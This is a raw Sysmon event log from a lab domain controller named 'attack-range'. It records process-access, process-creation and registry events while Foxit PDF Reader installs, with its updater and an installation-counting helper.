12:16:37.192{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.192{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.192{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.191{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.190{FE4C2B44-E2B7-63C7-D405-00000000AF02}25441972C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+ad075|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+afbe7|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+d8818|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+f4a88|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+94c76|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+93a8f|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+fa0ea|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+e5089|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+e60b8|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+c9a35|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+5cdc5 154100x800000000000000039275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.135{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe12.1.0.15192Foxit UpdaterFoxit UpdaterFoxit CorporationFoxit Updater.EXE"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe" /version 12.1.0.15250 /green 0 /appname "Foxit PDF Reader" /productid 1 /ReaderLang en_us /AgentName "Foxit Reader(bundle PhantomStd)" /AgencyID 90 /isPhantom 0 /newuser 1 /IsWin10 1 /updaterinstall Website /uninstall 0C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=9968A58D93AF316E2D4EA79B0CCCF0FB,SHA256=3D79910A9B723D8B923AD7463BE373A9147745B743F5B03F7ABC25201CBC86DB,IMPHASH=BD3F29B8D5BB0B0238E0071DCEF6C8FA{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp"C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp" /SL5="$30334,167691783,421376,C:\Users\Administrator\Downloads\FoxitPDFReader121_enu_Setup_Prom.exe" 10341000x800000000000000039274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.159{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.159{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.159{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.143{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.143{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.128{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.120{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.120{FE4C2B44-E2B7-63C7-D405-00000000AF02}25441972C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+ad075|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+afbe7|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+d8818|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+f4a88|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+94c76|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+93a8f|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+fa0ea|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+e5089|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+e60b8|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+c9a35|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+5cdc5 154100x800000000000000039262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.099{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe9.0.0.505---CountInstalltion.EXE"C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe" /version 12.1.0.15250 /green 0 /appname "Foxit PDF Reader" /productid 1 /ReaderLang en_us /AgentName "Foxit Reader(bundle PhantomStd)" /AgencyID 90 /isPhantom 0 /newuser 1 /IsWin10 1 /updaterinstall Website /uninstall 0C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=A0482A7D4D5F804BEEF642D3F42BEDEB,SHA256=BA063AC1A37375D174FD323A1DFA05E44BA27E94917A1C7F3D5D224688ED82B3,IMPHASH=9E0489BDAC05725973504175B2148FAD{FE4C2B44-E2B7-63C7-D405-00000000AF02}2544C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp"C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp" /SL5="$30334,167691783,421376,C:\Users\Administrator\Downloads\FoxitPDFReader121_enu_Setup_Prom.exe" 10341000x800000000000000039261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.099{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000039374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginPSConversion\FriendlyNamePSConversion 13241300x800000000000000039373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginImanage10\FriendlyNameiManage 10 Integration 13241300x800000000000000039372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitArchiveConnector\FriendlyNameAlfresco 13241300x800000000000000039371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginDMSforLegal\FriendlyNameDMSforLegal Integration 13241300x800000000000000039370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginShareFile\FriendlyNameShareFile Integration 13241300x800000000000000039369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginContentSuite\FriendlyNameContentSuite Integration 13241300x800000000000000039368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginWorldox\FriendlyNameWorldox Integration 13241300x800000000000000039367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginEgnytePlugin\FriendlyNameEgnytePlugin 13241300x800000000000000039366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 